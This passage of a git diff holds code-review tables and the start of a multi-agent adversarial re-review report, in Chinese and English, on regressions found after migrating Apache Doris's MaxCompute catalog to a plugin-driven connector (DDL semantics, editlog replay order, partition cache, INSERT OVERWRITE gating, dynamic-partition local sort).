DDL-C2 DDL 远端名解析丢失:CREATE/DROP TABLE 用本地名直发连接器 | new | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:187 (§5 名称约定'验证项') | 与 DDL-P3 同根 (CREATE+DROP 两侧的 local-vs-remote 名透传),证据同 DDL-P3。归 new:历史无任何 DV/决策记录翻闸 DDL 的远端名解析丢失。T06c 设计仅把名称约定标为'验证项'并假定连接器内部解析(代码反证)。 | +| DDL-C3 DROP DATABASE ... FORCE 的级联语义被静默丢弃 | disagreement | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:185 (§5 force 不复刻,记 OQ) | 与 DDL-P2 同一发现的 C-轨版本,证据同 DDL-P2 (PluginDrivenExternalCatalog.java:325/335;MaxComputeConnectorMetadata.java:366-371;legacy MaxComputeMetadataOps.java:142-155)。归 disagreement:T06c 设计 §5 把 force 丢弃当作可接受的已知边界,本轮认为是 major 语义回归 (非空 schema FORCE 行为反转)。 | +| DDL-C5 CREATE TABLE IF NOT EXISTS 命中已存在表时翻闸仍写 logCreateTable + 重置缓存 (legacy 为 no-op) | new | fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:257-261 (createTable javadoc 自陈 void 签名不能区分 newly-created vs already-existed) | 代码证实 (PluginDrivenExternalCatalog.java:269-287 无论是否实际新建一律 logCreateTable+resetMetaCacheNames return false;MaxComputeConnectorMetadata.java:288-296 已存在+ifNotExists 静默 return void;legacy MaxComputeMetadataOps.java:182 已存在返 true→ExternalCatalog.java:1064 res==true 跳过 logCreateTable)。createTable override 的 javadoc(:257-261)确实承认了 SPI void 签名不能区分'新建 vs 已存在'并'conservatively assumes creation happened',但这是作为设计取舍写在代码注释里,历史规划文档(decisions/deviations/HANDOFF/设计)从未把'IF NOT EXISTS no-op 仍写 editlog'当作回归记录或评估其影响。归 new(规划层面未记)。 | + +### 路径4 — 元数据回放 (editlog -> replay, master vs follower 状态重建) + +| id | severity | title | evidence (翻闸 / legacy) | legacy-diff | regression | adversarial-verdict | recommendation | +|---|---|---|---|---|---|---|---| +| REPLAY-P1 | minor | Master-side ordering swapped: cutover writes editlog BEFORE cache-reset; legacy resets cache BEFORE editlog (no observable regression) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:310-311; :339-340; :279-283; :371-372
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/operations/ExternalMetadataOps.java:47-53,78-81; fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java:1008-1012,1037-1039 | On the master, legacy order is [remote op -> local cache reset -> editlog write]; cutover order is [remote op -> editlog write -> local cache reset]. The two side effects are swapped. | no | ✅存活 (3✓/0✗ of 3) | Accept. Ordering swap has no observable consequence; not worth a code change. | +| REPLAY-C1 | minor | master 侧 cache 失效与 editlog 写入的相对顺序在翻闸路径被反转(legacy: 先失效后写日志;翻闸: 先写日志后失效) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:279-283 (createTable: logCreateTable 先, resetMetaCacheNames 后); 310-311 (createDb); 339-340 (dropDb); 371-372 (dropTable)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/operations/ExternalMetadataOps.java:47-53,78-81,92-98,105-108 (default createDb/dropDb/createTable/dropTable: 先 afterX cache 失效); fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java:1008-1012 (metadataOps.createDb 先于 logCreateDb) | legacy master 在 metadataOps.createDb/dropTable 内部先执行 afterX(resetMetaCacheNames/unregisterTable),再写 editlog;翻闸 override 先写 editlog 再做 cache 失效。两步都在同一 FE 内存/本地 journal,无跨节点可见性差异,且 metaCache 失效是同步本地操作。 | no | ✅存活 (2✓/1✗ of 3) | 接受。无功能回归;若追求与 legacy 严格逐字对齐可把 cache 失效移到 logX 之前,但收益极小。 | +| REPLAY-P2 | question | DROP DATABASE FORCE no longer cascades remote table drops (force not forwarded); replay stays symmetric | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:325-342; fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:366-371
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:142-156 | Legacy dropDbImpl with force==true lists all remote tables and remote-drops each before dropping the db; cutover ignores force and only calls connector.dropDatabase(dbName, ifExists), and the connector does no table cascade. | unsure | ✅存活 (2✓/0✗ of 3) | Defer to the path-3 (DDL) review which owns force/cascade. From the replay mandate this is not a regression. Path-3 reviewer should confirm whether remote MaxCompute DROP DATABASE on a non-empty db requires the legacy explicit cascade. | +| REPLAY-C2 | question | 翻闸 follower 回放 4 个动作与 legacy afterX 逐字等价 —— 确认回放路径无回归(正向核验) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java:1020-1028 (replayCreateDb else→resetMetaCacheNames); 1046-1053 (replayDropDb else→unregisterDatabase); 1082-1089 (replayCreateTable else→getDbForReplay().resetMetaCacheNames); 1140-1147 (replayDropTable else→getDbForReplay().unregisterTable)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:127-129 (afterCreateDb); 160-162 (afterDropDb); 252-259 (afterCreateTable); 292-299 (afterDropTable) | 无可观察差异。翻闸 replayX else 分支调用的四个方法与 legacy afterX 方法体逐字相同;legacy 仅多一行 LOG.info(无副作用)。 | no | ✅存活 (3✓/0✗ of 3) | 接受(无需修改)。本项为正向核验,确认 D1/D5 在回放路径上两侧对称。 | + +**Phase C 交叉核对:** + +| finding | 分类 | history_ref | note | +|---|---|---|---| +| REPLAY-P1 Master-side ordering swapped: cutover writes editlog BEFORE cache-reset; legacy resets cache BEFORE editlog (no observable regression) | new | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:24-39,103,114,126,131 (§1.2 缓存失效缺口); plan-doc/HANDOFF.md:18 | 新发现。历史 T06c 设计与 HANDOFF 只讨论缓存失效是否发生(master 经 override / follower 经 replayX 的 parity),从未讨论 master 侧 editlog 写入与 cache-reset 的相对顺序。grep 全部 plan-doc 对 editlog-vs-cache ordering 零命中。代码核实前提成立:legacy ExternalCatalog.java:1007-1012 createDb 先调 metadataOps.createDb(内部 afterCreateDb→resetMetaCacheNames)后 logCreateDb;翻闸 PluginDrivenExternalCatalog.java:310-311 先 logCreateDb 后 resetMetaCacheNames,两副作用被互换。本轮与历史一致同意此互换在单 FE 内无可观察回归(两步皆本地同步、editlog 是 local journal 追加),属 minor。设计文档对此顺序反转完全未记。 | +| REPLAY-P2 DROP DATABASE FORCE no longer cascades remote table drops (force not forwarded); replay stays symmetric | disagreement | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:57,111,185 (§5 边界: dropDb 无 force, force 不传, legacy force 级联删表不复刻 记 OQ); plan-doc/tasks/P4-cutover-adversarial-review.md:77 (D3 丢弃语义 ifExists/force/ifNotExists) | 历史已记同一事实(force 被丢、不复刻 legacy 级联),但分类为 disagreement 而非 matches-history:T06c 设计把它框定为「已知语义差(fail loud)/ 边界」并暗示非问题(仅「记 OQ,连接器侧日后增强」),未承认这是可观察的功能损失。本轮证据(连接器 MaxComputeConnectorMetadata.java:366-371 dropDatabase 只调 structureHelper.dropDb 零级联;legacy MaxComputeMetadataOps.java:142-156 force==true 时 listTableNames 逐表 remote-drop)确认翻闸后 DROP DATABASE FORCE 对非空库行为改变。归 question 严重度——需用户确认 MaxCompute dropDb 是否远端自带级联,否则即回归。replay 侧对称(两路均不级联),无回放非对称问题。 | +| REPLAY-C1 master 侧 cache 失效与 editlog 写入的相对顺序在翻闸路径被反转(legacy 先失效后写日志;翻闸先写日志后失效) | new | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:24-39 (§1.2); plan-doc/HANDOFF.md:18 | 与 REPLAY-P1 同一发现(C1 是 P1 的 master-only 子集表述)。同样为新发现:历史只记缓存失效缺口的补齐(A1 全对齐),对 editlog↔失效 的执行顺序反转零记录。代码核实:翻闸 PluginDrivenExternalCatalog.java:279-283/310-311/339-340/371-372 四个 op 均 logX 先、cache 失效后;legacy 经 ExternalMetadataOps default(:47-53,78-81,92-98,105-108) 先 afterX 失效再由 ExternalCatalog(:1008-1012 等)写 editlog。两步同 FE 本地、无跨节点可见性差,minor、无回归。 | +| REPLAY-C2 翻闸 follower 回放 4 个动作与 legacy afterX 逐字等价 —— 确认回放路径无回归(正向核验) | matches-history | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:136-145 (§4.2 follower replayX else 分支), 194-201 (§6 决策 A1); plan-doc/HANDOFF.md:18,59 | matches-history。这正是 T06c 决策 A1(全对齐)的 follower 侧落地:replayX 的 metadataOps==null else 分支被有意添加以镜像 legacy afterX。代码核实四分支逐字等价:ExternalCatalog.java replayCreateDb:1026 resetMetaCacheNames / replayDropDb:1051 unregisterDatabase / replayCreateTable:1087 getDbForReplay().resetMetaCacheNames / replayDropTable:1145 getDbForReplay().unregisterTable —— 与 legacy MaxComputeMetadataOps.afterCreateDb:128 / afterDropDb:161 / afterCreateTable:253-255 / afterDropTable:293-295 方法体一致(legacy 仅多 LOG.info,无副作用)。正向核验,确认回放路径无回归,与历史结论一致。 | + +### 路径5 — 元数据 cache (db/table 名单, schema, 分区; 失效时机与一致性) + +| id | severity | title | evidence (翻闸 / legacy) | legacy-diff | regression | adversarial-verdict | recommendation | +|---|---|---|---|---|---|---|---| +| CACHE-C1 | major | partitions() TVF 对翻闸后的 MaxCompute(PluginDriven)在 FE analyze 阶段直接被拒,T06c 只补了 BE 侧 handler,FE 网关漏改 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java:172-176 (catalog 类型网关只允许 internal/HMS/MaxComputeExternalCatalog,不含 PluginDrivenExternalCatalog);PartitionsTableValuedFunction.java:184-185 (getTableOrMetaException 只接受 OLAP/HMS/MAX_COMPUTE_EXTERNAL_TABLE,不含 PLUGIN_EXTERNAL_TABLE);构造即 analyze:PartitionsTableValuedFunction.java:149;Nereids 入口 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/expressions/functions/table/Partitions.java:47;新增但不可达的 BE handler:fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java:1317-1318,1359-1377
legacy legacy MaxCompute 是 MaxComputeExternalCatalog/MAX_COMPUTE_EXTERNAL_TABLE,可通过 PartitionsTableValuedFunction.java:172-176 与 184-185 两道网关,并由 MetadataGenerator.dealMaxComputeCatalog 处理:fe/fe-core/src/main/java/org/apache/doris/tablefunction/MetadataGenerator.java:1315-1316,1344-1357 | legacy: SELECT * FROM partitions('catalog'='mc','database'='d','table'='t') 正常返回分区名;翻闸后:同一语句在 analyze 阶段抛 AnalysisException("Catalog of type 'max_compute' is not allowed in ShowPartitionsStmt" 或 table-type MetaNotFound),BE 侧 dealPluginDrivenCatalog 永不被触达 | yes | ✅存活 (3✓/0✗ of 3) | 修。两处都要补:PartitionsTableValuedFunction.analyze 的 catalog 网关加 `\|\| catalog instanceof PluginDrivenExternalCatalog`,getTableOrMetaException 加 TableType.PLUGIN_EXTERNAL_TABLE;并补 PluginDriven 分支的 "是否分区表" 判定(见相邻 isPartitionedTable 发现)。同时加一条端到端用例覆盖 partitions() TVF 走 PluginDriven。 | +| CACHE-C2 | major | PluginDrivenExternalTable 未 override isPartitionedTable(),翻闸后 SHOW PARTITIONS 对真实分区的 MaxCompute 表误报 "not a partitioned table" | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java (全类无 isPartitionedTable/getPartitionColumns/getNameToPartitionItems/supportInternalPartitionPruned 覆写);默认实现 fe/fe-core/src/main/java/org/apache/doris/catalog/TableIf.java:364-366 返回 false;SHOW PARTITIONS 校验点 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java:263-266;MC 翻闸建表用 PluginDrivenExternalTable:fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalDatabase.java:39-41
legacy legacy MaxComputeExternalTable 覆写 isPartitionedTable() 返回 getOdpsTable().isPartitioned():fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java:331-335;legacy 分区列/分区项来自 schema cache:MaxComputeExternalTable.java:88-114,116-125;legacy 分区值二级 cache:fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCache.java:79-109 | legacy: SHOW PARTITIONS FROM 正常列分区;getPartitionColumns/getNameToPartitionItems 非空,支持 FE 侧内部分区裁剪(supportInternalPartitionPruned=true)。翻闸后:isPartitionedTable() 恒为 false,ShowPartitionsCommand.analyze 在 263-266 抛 "Table X is not a partitioned table";同时 FE 视该表为非分区表,getPartitionColumns/getNameToPartitionItems 均空,内部分区裁剪能力(legacy 有,带 partition_values cache)丢失。 | yes | ✅存活 (3✓/0✗ of 3) | 修。PluginDrivenExternalTable 需按 connector 能力暴露分区元数据:override isPartitionedTable()(可据 ConnectorTableSchema 的 partition_columns 属性,见 MaxComputeConnectorMetadata.getTableSchema:150-153)、getPartitionColumns()、getNameToPartitionItems(),并视需要 supportInternalPartitionPruned()。若本批次只想恢复 SHOW PARTITIONS 显示,最小修法是让 isPartitionedTable()/getPartitionColumns() 经 connector 返回真实分区列;但内部裁剪能力的缺失应显式记录为已知降级。 | +| CACHE-P1 | minor | 翻闸丢弃 legacy 的 FE 侧分区缓存 (partition_values entry) + 内部分区裁剪能力,改为每次扫描直连 ODPS 列举分区 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:52-260 (未 override supportInternalPartitionPruned/getNameToPartitionItems/getPartitionColumns/getMetaCacheEngine);fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java:355-378 (getSplits 走 connector planScan);fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java:198-215 (listPartitions 注释明确『no connector-side cache』,直读 ODPS)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java:82-125 (supportInternalPartitionPruned=true; getNameToPartitionItems/getPartitionColumns 从 schema cache);fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCache.java:49-109 (ENTRY_PARTITION_VALUES 缓存,随 schema 失效);fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:109-238 (用 SelectedPartitions FE 侧裁剪) | legacy: 分区清单缓存在 maxcompute 引擎的 partition_values entry 里(随 schema cache 一起按 nameMapping 失效),且 FE 侧用缓存做内部分区裁剪(initSelectedPartitions 走 supportInternalPartitionPruned 分支)。翻闸: PluginDrivenExternalTable 继承基类默认值——supportInternalPartitionPruned=false、getNameToPartitionItems/getPartitionColumns 返回空,initSelectedPartitions 直接 NOT_PRUNED;分区筛选下沉到 connector 的 applyFilter/planScan,每次查询直连 ODPS 列举分区(无 FE 缓存)。partition_values cache 在翻闸路径上变成死代码(唯一消费者 MaxComputeExternalTable 不再走到)。 | unsure | ✅存活 (3✓/0✗ of 3) | 待定。从 cache 一致性看翻闸更安全(无陈旧分区读窗口),可接受;但需确认 connector 下推的分区裁剪等价于 legacy FE 侧裁剪(交由路径1 read 复审),并确认放弃 FE 分区缓存对大分区表查询的 planning 性能可接受。若性能回退,可考虑在 PluginDrivenExternalTable 上接 default 引擎的分区缓存。 | +| CACHE-P2 | question | DROP DATABASE 翻闸不转发 force/cascade,虽 cache 终态一致但远端语义与 legacy 不同 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:324-342 (dropDb 不转发 force,注释『force intentionally not forwarded』);fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java:366-371 (dropDatabase 仅 structureHelper.dropDb,无级联)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:132-162 (dropDbImpl force=true 时遍历 remote 表逐个 dropTableImpl,再 dropDb;afterDropDb→unregisterDatabase) | legacy DROP DATABASE ... FORCE 会先逐表 drop remote 表再 drop db;翻闸把 force 吞掉,只让 connector dropDb(若库非空且 ODPS 不自动级联,远端 drop 可能失败或语义不同)。cache 维度:两侧最终都走 unregisterDatabase(dbName) 把整库(含其下所有表)从 FE 缓存清掉,缓存终态一致。 | unsure | ✅存活 (3✓/0✗ of 3) | 接受(就 cache 维度)。force 级联语义的取舍交由路径3 DDL 复审;cache 失效在两侧对称,无需在本路径修复。 | +| CACHE-C3 | question | 翻闸 dropDb 不下推 force,FORCE DROP DATABASE 的级联语义与 cache 失效范围依赖连接器,与 legacy 显式逐表 drop 不同 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:324-342 (dropDb override:force 参数不下推 connector,仅 dropDatabase(session,dbName,ifExists);随后 unregisterDatabase(dbName) 整库失效);connector 实现 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:366-371 (dropDatabase 不处理级联)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:132-157 (dropDbImpl:force 时先 listTableNames 逐表 dropTableImpl,再 dropDb);afterDropDb -> unregisterDatabase:MaxComputeMetadataOps.java:159-162 | legacy FORCE DROP DATABASE 在远端逐表删除后再删库;翻闸侧把 force 丢弃,级联与否完全交给 connector 的 dropDatabase(MC connector 未做级联)。两侧远端副作用可能不同(远端是否要求空库)。对 FE cache:两侧最终都 unregisterDatabase 整库失效,cache 层一致,无陈旧读。 | unsure | ✅存活 (3✓/0✗ of 3) | 待定(归路径3裁定)。cache 一致性侧:无需改动,unregisterDatabase 的整库失效已覆盖子表 schema cache。若路径3决定保留 force 级联语义,需确保级联逐表 drop 时各表 schema/row-count cache 也被失效(当前整库失效已隐含覆盖)。 | + +**Phase C 交叉核对:** + +| finding | 分类 | history_ref | note | +|---|---|---|---| +| CACHE-P1 翻闸丢弃 legacy FE 侧分区缓存(partition_values entry)+ 内部分区裁剪能力,改为每次扫描直连 ODPS 列举分区 | new | plan-doc/deviations-log.md:128-133 (DV-007); plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:55 (OQ-5/partition_values) | 历史从未把『翻闸丢失 FE 侧内部分区裁剪 + partition_values cache』登记为偏差/回归。代码核实:PluginDrivenExternalTable.java(全类,我已读 52-260 行)未 override supportInternalPartitionPruned/getNameToPartitionItems/getPartitionColumns/isPartitionedTable;legacy MaxComputeExternalTable.java 全部 override(:83 supportInternalPartitionPruned, :92 getPartitionColumns, :100 getNameToPartitionItems, :332 isPartitionedTable)。connector MaxComputeConnectorMetadata.java:196-215 listPartitions 注释明确『no connector-side cache, read directly from ODPS (OQ-4)』。DV-007 只谈 P3-hudi 的 listPartitions* override 推迟,DV-012 只谈 partition_columns 源;均未覆盖『翻闸后 MC 失去 FE 侧 SelectedPartitions 裁剪 + 二级 partition_values cache』。这是 NEW —— 历史把『连接器无自有 cache』当 OQ-4 已解的设计选择,但未承认它在 MC 路径上消灭了 legacy 已有的 FE 缓存+裁剪能力(性能/语义回归,非纯重构)。 | +| CACHE-P2 DROP DATABASE 翻闸不转发 force/cascade,cache 终态一致但远端语义与 legacy 不同 | matches-history | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:185 (§5 边界); fe/.../PluginDrivenExternalCatalog.java:319-322 (代码注释) | MATCHES-HISTORY 且历史承认是已知语义差(非声称无问题)。T06c 设计 §5『dropDb 无 force(SPI)』明确写:force 被丢弃、legacy dropDbImpl 的级联删表逻辑不复刻、留 OQ。代码 PluginDrivenExternalCatalog.java:335 仅传 ifExists,注释 :319-322『force intentionally not forwarded』。legacy MaxComputeMetadataOps.dropDbImpl(我已读)在 force=true 时 listTableNames 逐表 dropTableImpl 再 dropDb。本轮『cache 终态一致(两侧均 unregisterDatabase)』与历史一致。无分歧。 | +| CACHE-C1 partitions() TVF 对翻闸后 MaxCompute 在 FE analyze 阶段直接被拒,T06c 只补 BE 侧 handler,FE 网关漏改 | disagreement | plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md:72 + :102; plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:253 (§9 step 6 [x]); plan-doc/HANDOFF.md:61 (commit ③ 2cf7dfa81ad) | DISAGREEMENT —— 历史声称 partitions() TVF 已接 PluginDriven,代码证伪。Batch D 设计 :72 明文『PartitionsTableValuedFunction (:173/:200) — P4-T06c adds a PluginDrivenExternalCatalog branch』;T06c 设计 §9 step6 标 [x];HANDOFF 记 commit ③『partitions() TVF PluginDriven 接线』。但 git show --stat 2cf7dfa81ad 仅改 MetadataGenerator.java + 测试,**未触 PartitionsTableValuedFunction.java**(该文件 git log 末次提交是无关的 #60247)。代码核实:PartitionsTableValuedFunction.java:172-176 网关仍只允许 internal/HMS/MaxComputeExternalCatalog,无 PluginDrivenExternalCatalog;:184-185 getTableOrMetaException 只接受 OLAP/HMS/MAX_COMPUTE_EXTERNAL_TABLE,无 PLUGIN_EXTERNAL_TABLE;且无 PluginDriven import。构造器 :149 即调 analyze() → 翻闸后 partitions('catalog'=mc...) 在 analyze 阶段抛 AnalysisException,MetadataGenerator.dealPluginDrivenCatalog(:1359-1377)永不可达=死代码。T06c 设计只规划改 MetadataGenerator(§4.4),漏了 TVF 自身的 analyze 网关,但 Batch D 设计却据此宣称已 rewire。 | +| CACHE-C2 PluginDrivenExternalTable 未 override isPartitionedTable(),翻闸后 SHOW PARTITIONS 对真实分区 MC 表误报 not a partitioned table | disagreement | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:252 (§9 step5 [x]) + :162 (isPartitionedTable 列为『验证项』); plan-doc/HANDOFF.md:60 (commit ② 91e9dd02924) | DISAGREEMENT —— 历史声称 SHOW PARTITIONS 已接 PluginDriven 且全绿,代码证明 isPartitionedTable 门仍拦截。T06c 确实修了两道门(代码核实:ShowPartitionsCommand.java:208 加 PluginDrivenExternalCatalog 入 allow-list、:261 加 PLUGIN_EXTERNAL_TABLE 入表类型校验、:460-461 加 dispatch 分支 + :312 handleShowPluginDrivenTablePartitions handler 实现)。**但** analyze() :263-266 对非 internal catalog 调 table.isPartitionedTable();PluginDrivenExternalTable 未 override(我已读全类,无此方法),TableIf.java:364-366 default 返 false → SHOW PARTITIONS 在 :265 抛『Table X is not a partitioned table』,先于 :446→:461 的 dispatch handler。handleShowPluginDrivenTablePartitions 对分区表成死代码。讽刺的是 T06c 设计 §4.3 :162 自己把 isPartitionedTable 列为『验证项』,但实现未补、commit ②/HANDOFF 仍标全绿。legacy MaxComputeExternalTable.java:332 override isPartitionedTable()=odpsTable.isPartitioned()。 | +| CACHE-C3 翻闸 dropDb 不下推 force,FORCE DROP DATABASE 级联语义与 cache 失效范围依赖连接器,与 legacy 显式逐表 drop 不同 | matches-history | plan-doc/tasks/designs/P4-T06c-fe-dispatch-wiring-design.md:185 (§5) + :49 (§6 决策); fe/.../PluginDrivenExternalCatalog.java:319-322,335 | MATCHES-HISTORY(与 CACHE-P2 同源,question 级)。T06c 设计 §5 已显式记录 force 丢弃 + 级联不复刻 + 留 OQ;代码注释 :319-322 印证 intentional。本轮结论『FE cache 两侧最终都 unregisterDatabase 整库失效、cache 层一致无陈旧读』与历史一致。connector dropDatabase(MaxComputeConnectorMetadata.java:366-371 仅 structureHelper.dropDb,无级联)亦与本轮一致。属已记录的 question,非分歧。 | + diff --git a/plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md b/plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md new file mode 100644 index 00000000000000..48a6faecfc977f --- /dev/null +++ b/plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md @@ -0,0 +1,188 @@ +# P4 — MaxCompute 全路径 clean-room 对抗复审报告 + +> **日期**:2026-06-07 | **分支**:`catalog-spi-05` (HEAD `e89ce146cee`) | **复审对象**:cutover 后 MaxCompute 全路径(含 P4-T06d 6 处修复本身),对照 legacy 基线 +> **方法**:`plan-doc/reviews/maxcompute-full-rereview.workflow.js`(clean-room:Phase A/B 子 agent 只读 `fe/ be/ gensrc/` 源码、禁读 plan-doc/memory;Phase C 才解禁先验做交叉核对) +> **运行**:`w4eua10d5` / 201 agents / 9.28M subagent tokens / 46min + +## 0. 运行统计与裁决 + +| 指标 | 值 | +|---|---| +| 域 × lens(Phase A 审阅者) | 6 × 2 = 12 | +| 每 finding refute 票(Phase B) | 3(≥2 票存活 + 多数) | +| 原始 findings | 52 | +| 存活(对抗后) | 33 | +| **新缺口 newGaps** | **12(去重后 8 个独立问题)** | +| **与历史分歧 disagreements** | **8(去重后 6 个独立问题)** | +| 总裁决 | **`attention-needed`** | + +**一句话结论**:返回行**结果正确**这一层站得住(descriptor/JNI/BE 线、事务生命周期、schema cache、editlog 序列化都被独立验为与 legacy 等价)。但**写入路径有 3 个 blocker 级回归**(INSERT OVERWRITE 整条被网关挡死、动态分区 INSERT 丢 local-sort、静态分区无列名 INSERT bind 失败),**读取路径的"分区裁剪已恢复"声明被证伪**(FIX-PART-GATES 只落了 FE 元数据半边,裁剪结果在 translator 被丢弃,ODPS read session 仍跨全分区),以及一批 DB 级 DDL 语义回归(DROP DB FORCE 不级联、CREATE DB IF NOT EXISTS 丢远端预检、CTAS IF-NOT-EXISTS 误写已存在表)。这些大多在写入/DDL 域,且**多为上一轮开发遗漏或被低估/搁置**。 + +> ⚠️ **性质说明**:本节所有 finding 均带 `file:line` 证据并通过 3 票对抗验证 + Phase C 交叉核对,置信度高;但仍是**复审结论,落地前请按指针核码**。写入域 blocker(尤其动态分区 local-sort、INSERT OVERWRITE)的真值闸仍是 **live e2e(真实 ODPS)**——CI 默认跳。 + +--- + +## A. 🆕 新缺口(newGaps)—— 开发遗漏、未在任何 plan-doc 登记 + +> 8 个独立问题(原始 12 条,含 lens 间重复:F3=F10、F6=F13、F42=F47、F17/F18 ⊂ F43)。按严重度降序。 + +### NG-1 |🔴 blocker |INSERT OVERWRITE 整条被网关挡死 +- **findings**:F42、F47(fallback 域,parity+delivery 双 lens 各自独立命中) +- **位置**:`InsertOverwriteTableCommand.java:315-323`(`allowInsertOverwrite` 网关),调用点 `:143` +- **根因**:`allowInsertOverwrite()` 只对 `OlapTable / RemoteDorisExternalTable / HMSExternalTable / IcebergExternalTable / MaxComputeExternalTable` 返回 true。翻闸后表是 `PluginDrivenExternalTable`,一个都不匹配 → `run()` 在 `:143` 抛 `AnalysisException("...only support OLAP/Remote OLAP and HMS/ICEBERG table. But current table type is PLUGIN_EXTERNAL_TABLE")`。 +- **cutover↔legacy**:legacy `MaxComputeExternalTable` → 网关放行 → OVERWRITE 执行;cutover → 网关拒绝,**整条命令在到达下层之前就抛错**。讽刺的是下层 `insertIntoValuesOrSelect`(`:420-440`)**已经完整接好** `UnboundConnectorTableSink` + `overwrite=true` + 静态分区 spec,只是永远到不了——典型"分发只接了一半"。 +- **处置**:作为第 7 个 cutover-fix(建议名 `FIX-OVERWRITE-GATE`),给 `allowInsertOverwrite` 加 `PluginDrivenExternalTable` 分支(按 FIX-PART-GATES 决策①走 SPI 泛型类型,OVERWRITE 是否支持由下游是否产出 `UnboundConnectorTableSink` 决定)。**Batch-D 红线**:删 legacy `MaxComputeExternalTable` 分支前必须先加 PluginDriven 分支。Rule-9 测试:翻闸表 INSERT OVERWRITE 修前红(AnalysisException)、修后过网关。 + +### NG-2 |🔴 blocker |动态分区 INSERT 丢失强制 local-sort("writer has been closed" 回归) +- **findings**:F17(write),并入 F43(fallback 综合) +- **位置**:`PhysicalConnectorTableSink.java:114-121`(vs legacy `PhysicalMaxComputeTableSink.java:111-155`) +- **根因**:翻闸后 sink 是泛型 `PhysicalConnectorTableSink`,其 `getRequirePhysicalProperties()` 只做 `supportsParallelWrite()? SINK_RANDOM_PARTITIONED : GATHER`。legacy `PhysicalMaxComputeTableSink` 对**动态分区写**专门返回 `DistributionSpecHiveTableSinkHashPartitioned + MustLocalSortOrderSpec`(按分区列),并注释(`:144-147`)说明:ODPS Storage API 在看到不同分区时会关闭上一个 partition writer,**未排序数据会触发 "writer has been closed"**。cutover 两者都没做(`MaxComputeDorisConnector` 无 `SUPPORTS_PARALLEL_WRITE` → 落 GATHER、且无 local-sort)。 +- **cutover↔legacy**:legacy 动态分区写 = hash-partition + local-sort(每 writer 收到按分区分组的行);cutover = GATHER 单 writer、无排序 = 单 writer 收到交错的多分区行 → BE 写失败风险。 +- **处置**:**不要只翻 `SUPPORTS_PARALLEL_WRITE` 能力位**——那只给 `SINK_RANDOM_PARTITIONED`(并行 writer)但仍缺 local-sort,照样 "writer has been closed"。正解:给 `PhysicalConnectorTableSink` 引入"连接器声明所需 distribution+sort"的钩子,`MaxComputeDorisConnector` 声明动态分区需 hash+local-sort(含 static/dynamic 三分支判别,照搬 legacy `:116-128`)。Batch-D 删 `PhysicalMaxComputeTableSink` 前必须先迁此逻辑(否则唯一副本丢失)。真值闸:真实 ODPS 跨多分区动态 INSERT 断言无 "writer has been closed"。 + +### NG-3 |🔴 blocker / 🟠 major |静态分区无列名 INSERT 在 bind 阶段失败 +- **findings**:F48(fallback,new-gap)+ **F19(write,被 Phase C 归为 disagreement——见 DG-2,同一根因)** +- **位置**:`BindSink.java:917-943`(`bindConnectorTableSink`) +- **根因**:`sink.getColNames()` 为空时,`bindColumns = table.getBaseSchema(true)`,**未剔除静态分区列**,也从不读 `sink.getStaticPartitionKeyValues()`。MaxCompute 的 `initSchema` 把分区列也加进 base schema,于是 `INSERT 